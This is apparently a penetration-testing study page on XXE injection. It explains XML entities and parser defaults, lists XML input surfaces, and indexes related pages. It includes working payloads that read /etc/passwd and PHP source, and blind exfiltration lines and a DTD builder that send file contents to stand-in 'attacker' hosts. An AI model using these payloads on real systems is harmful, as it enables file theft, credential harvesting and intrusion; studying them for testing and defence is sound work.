XXE
When a web app processes XML from user input and the parser has external-entity resolution enabled, the operator can declare entities that point at server-side resources - local files, internal URLs, or even (with PHP’s expect://) shell commands. The vulnerability is mostly a function of using an outdated or poorly-configured XML library.
    # 1. Find an XML input surface (SOAP, REST-with-XML, form data with Content-Type: application/xml,
    #    SVG upload, DOCX/XLSX upload, anywhere "Content-Type: text/xml" or "application/xml" appears)

    # 2. Prove entity resolution works
    <!DOCTYPE foo [<!ENTITY test "PROOF">]>
    <root><field>&test;</field></root>
    # → if the response reflects "PROOF" where the entity was, you're in

    # 3. Read local file
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
    <root><field>&xxe;</field></root>

    # 4. Read source code via PHP filter wrapper
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">]>
    <root><field>&xxe;</field></root>

    # 5. Blind exfil via out-of-band DTD
    <!DOCTYPE foo [<!ENTITY % remote SYSTEM "http://attacker/x.dtd">%remote;%oob;]>

Success indicator: a file’s contents (or their base64 encoding) appear in the application’s response, or the attacker’s listener receives an HTTP/DNS callback containing the file’s contents.
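When the php://filter wrapper is used, the file comes back base64-encoded, so checking the success indicator involves a decoding step. The following is a minimal sketch of that step, not part of the original workflow: extract_base64_payload is a hypothetical helper name, and the 16-character minimum is an arbitrary assumption chosen to skip ordinary words in the response.

```python
import base64
import binascii
import re

# Runs of base64 characters, optionally padded. The minimum length (16) is an
# arbitrary threshold for this sketch so that ordinary words are not matched.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def extract_base64_payload(response_body):
    """Return every base64 run in the response that decodes to UTF-8 text."""
    decoded = []
    for match in BASE64_RUN.finditer(response_body):
        candidate = match.group(0)
        try:
            raw = base64.b64decode(candidate, validate=True)
            decoded.append(raw.decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            # Not valid base64, or not text: ignore and keep scanning.
            continue
    return decoded


# Simulated response in which a reflected entity carries an encoded PHP file.
encoded = base64.b64encode(b"<?php echo 'hello world'; ?>").decode("ascii")
body = "<root><field>" + encoded + "</field></root>"
print(extract_base64_payload(body))
```

Long alphanumeric strings that happen to be valid base64 would also be returned, so the output still needs a manual look.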
XML in one minute
XML is a structured text format using tags to nest elements:

    <?xml version="1.0" encoding="UTF-8"?>
    <email>
      <recipients>
      </recipients>
      <body>Hello, kindly share the invoice...</body>
    </email>

Key concepts:
| Concept | Example | Notes |
|---|---|---|
| Declaration | <?xml version="1.0" encoding="UTF-8"?> | First line; defines XML version and encoding |
| Element | <sender>...</sender> | Tag pair around content |
| Attribute | <email type="invoice"> | Key-value pairs on tags |
| Entity | &amp;amp;, &amp;lt;, &amp;company; | Named placeholder; resolved at parse time |
| DTD (Document Type Definition) | <!DOCTYPE foo [ ... ]> | Schema and entity declarations |
The entity machinery is what makes XXE possible. An entity is a variable in XML - declared in the DTD, referenced in the document body with &name;. The XML parser performs the substitution at parse time.
Internal entities
Declared and used in the same document:

    <!DOCTYPE foo [
      <!ENTITY greeting "Hello world">
    ]>
    <message>&greeting;</message>

The parser resolves &greeting; to Hello world before the application sees the parsed XML. This has no security implication on its own.
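To see parse-time substitution in practice, the same document can be fed to any XML parser. The sketch below uses Python's standard-library xml.etree.ElementTree purely as an illustration; the variable names are arbitrary.

```python
import xml.etree.ElementTree as ET

DOCUMENT = """<!DOCTYPE foo [
  <!ENTITY greeting "Hello world">
]>
<message>&greeting;</message>"""

# The parser substitutes the entity while parsing; application code only
# sees the expanded text, never the "&greeting;" reference itself.
root = ET.fromstring(DOCUMENT)
print(root.tag)
print(root.text)
```

The application code never handles the entity reference, which is why the later external-entity variants work without any cooperation from the application logic.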
External entities - the vulnerability
Entities can point at external resources:

    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <message>&xxe;</message>

When the parser resolves &xxe;, it reads /etc/passwd from disk and substitutes the file contents. The application then renders <message> containing the full passwd file. Vulnerability primitive: arbitrary file read.
Parameter entities
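A second class of entities, declared with % and referenced as %name;, that can only be referenced inside the DTD:

    <!DOCTYPE foo [
      <!ENTITY % file SYSTEM "file:///etc/passwd">
      <!ENTITY % wrapper "<!ENTITY exfil SYSTEM 'http://attacker/?%file;'>">
      %wrapper;
    ]>
    <message>&exfil;</message>

Parameter entities can be combined with other entity declarations in ways general entities cannot. This is the mechanism for out-of-band exfiltration when the application doesn’t echo entity content back - see Blind exfil. Note that XML 1.0 forbids parameter-entity references inside markup declarations in the internal DTD subset, so a conforming parser rejects the nested %file; reference as written here; in practice the wrapper declarations are served from an attacker-hosted external DTD, where that restriction does not apply.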
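The out-of-band pattern relies on a DTD file served from a host the tester controls. As a rough sketch of what that file could contain, the helper below assembles the two declarations as text. Everything here is illustrative: build_hosted_dtd, the entity names file, oob and content, the data query parameter, and the attacker.example host are assumptions, not names taken from a specific tool.

```python
def build_hosted_dtd(target_file, callback_url):
    """Build the text of an external DTD that defines %file; and %oob;.

    %file; reads the target file, and %oob; declares a general entity
    (named "content" here) whose URL embeds the file contents.
    """
    return (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        f"<!ENTITY % oob \"<!ENTITY content SYSTEM '{callback_url}?data=%file;'>\">\n"
    )


# Hypothetical target file and callback host, for illustration only.
dtd_text = build_hosted_dtd("/etc/hostname", "http://attacker.example/collect")
print(dtd_text)
```

Files containing newlines or other characters that are invalid in a URL generally will not survive this form, which is one reason the base64 filter wrapper is often used for the %file; declaration on PHP targets.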
Why XXE exists
XML parsers historically resolved external entities by default. The XML 1.0 spec doesn’t forbid it; security-conscious settings are opt-in. So apps using older or unhardened XML libraries (libxml2 before 2.9, Java’s JAXP SAX/DOM parsers left at their defaults, .NET XmlReader without XmlResolver = null) inherit the unsafe default.
Many modern parsers ship with external entities disabled. But:
- Many legacy apps still run on outdated XML stacks
- Some apps re-enable external entities for legitimate reasons (XML schema validation against external schemas) without realizing the implications
- Document-processing chains (SVG → image, DOCX → text extraction) may invoke XML parsing transitively in components the developer doesn’t think of as “XML parsers”
The result: XXE remains common enough that OWASP gave it a dedicated entry, A4:2017 (XML External Entities), before folding it into A05:2021 (Security Misconfiguration).
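How a given stack behaves is easy to check directly. As one illustration of a parser that does not resolve external entities, Python's standard-library xml.etree.ElementTree raises a ParseError when it meets an external entity reference. The sketch below wraps that check; resolves_external_entities is a name made up for this example, and the result only describes this one parser, not the target application's.

```python
import xml.etree.ElementTree as ET

PAYLOAD = """<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<message>&xxe;</message>"""


def resolves_external_entities(document):
    """Return False if the stdlib parser refuses the external entity."""
    try:
        root = ET.fromstring(document)
    except ET.ParseError:
        # ElementTree does not fetch external entities; the unresolved
        # reference surfaces as a parse error instead of file contents.
        return False
    return bool(root.text)


print(resolves_external_entities(PAYLOAD))
```

A parser with external entity resolution enabled would instead return the file contents as the element text, which is the behavior the payloads on this page probe for.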
Where to find XML input
| Surface | Indicator |
|---|---|
| SOAP API | Content-Type: text/xml; charset=utf-8, SOAPAction: header |
| REST with XML body | Content-Type: application/xml (sometimes accepted alongside JSON via content negotiation) |
| RSS/Atom feed ingestion | “Subscribe to feed”, URL-input fields that fetch XML |
| SVG upload | SVG is XML; image-processors may parse it as XML |
| DOCX / XLSX / ODT upload | Office documents are ZIP archives of XML; some servers parse the embedded XML |
| Web form with XML body | Some apps switched from forms to XML internally but kept the form UI |
| WS-Trust / SAML / WS-Federation | All XML-based protocols |
| JNLP, BPMN, OWL, KML, GPX | Niche XML formats; each is a potential XXE surface |
The “JSON API accepts XML on Content-Type swap” case is worth emphasizing. Some servers choose a body parser based on the Content-Type header, so resending the same data as XML with Content-Type: application/xml instead of application/json can expose XML parsing paths the developers never anticipated.
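The body conversion for that swap can be scripted. The following is a minimal sketch under several assumptions: json_body_to_xml is a hypothetical helper, the wrapper element name root and the item tag used for list members are guesses that would need adjusting to whatever the target expects, and JSON keys are assumed to be valid XML element names.

```python
import json
import xml.etree.ElementTree as ET


def json_body_to_xml(json_body, root_tag="root"):
    """Convert a JSON object into an equivalent XML request body."""

    def build(parent, value):
        if isinstance(value, dict):
            for key, child_value in value.items():
                build(ET.SubElement(parent, key), child_value)
        elif isinstance(value, list):
            # "item" is an assumed tag name for list members.
            for item in value:
                build(ET.SubElement(parent, "item"), item)
        else:
            parent.text = "" if value is None else str(value)

    root = ET.Element(root_tag)
    build(root, json.loads(json_body))
    return ET.tostring(root, encoding="unicode")


xml_body = json_body_to_xml('{"name": "alice", "age": 30}')
headers = {"Content-Type": "application/xml"}  # replaces application/json
print(xml_body)
```

If the server answers the XML version with a normal response or an XML parser error rather than a generic 415 or 400, the endpoint is worth testing with the entity reflection probe.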
Attack outcomes
What XXE produces depends on the parser and the application:
| Outcome | Requirement | Where covered |
|---|---|---|
| File read (response-reflected) | Entity content is echoed in response | File disclosure |
| File read (blind) | No reflection, but parser supports parameter entities and external HTTP | Blind exfil |
| Source-code read | PHP target (via php://filter) or Java directory listing | File disclosure |
| SSRF | Parser supports HTTP schemes (http://, https://) | RCE and SSRF |
| RCE | PHP expect:// wrapper enabled (uncommon in modern installs) | RCE and SSRF |
| DoS via entity expansion | Modern parsers limit entity expansion; older ones don’t | RCE and SSRF |
| Windows hash theft | Windows host parsing UNC paths via \\attacker\share\file | Brief in RCE and SSRF |
The most common deliverable is file read - extracting /etc/passwd, configuration files with DB credentials, source code, SSH keys. From there, the engagement often pivots to lateral movement using harvested credentials.
What this cluster covers
| Page | Focus |
|---|---|
| Identifying | Finding XML surfaces, the JSON-to-XML Content-Type pivot, the <!ENTITY test "value"> reflection probe |
| File disclosure | Basic file://, source-code via php://filter/convert.base64-encode, Java directory listing, high-value file targets |
| Blind exfil | CDATA wrap via external parameter entities, error-based exfil, full out-of-band HTTP exfil with hosted DTD |
| RCE and SSRF | PHP expect:// to webshell drop, internal port scanning, billion-laughs DoS, Windows UNC hash theft |
| Automation | XXEinjector tool walkthrough, request-file format, automated CDATA/error/OOB modes |
| Skill assessment chain | Capstone walkthrough - IDOR + verb tampering + XXE combining to read /flag.php |
Cross-cluster references
| Topic | Page |
|---|---|
| Reaching XXE via XSLT injection | XSLT injection |
| Reaching XXE via SVG upload | Limited uploads |
| SSRF as a primary class (XXE-SSRF is one delivery mechanism) | SSRF cluster |
| File-read patterns analogous to XXE | LFI cluster |
| Chained SOAP → XXE attacks | SSRF chained |
| Verb tampering inside XML endpoints | Verb tampering |
| IDOR-protected XML endpoints (admin-only event creation, etc.) | IDOR cluster |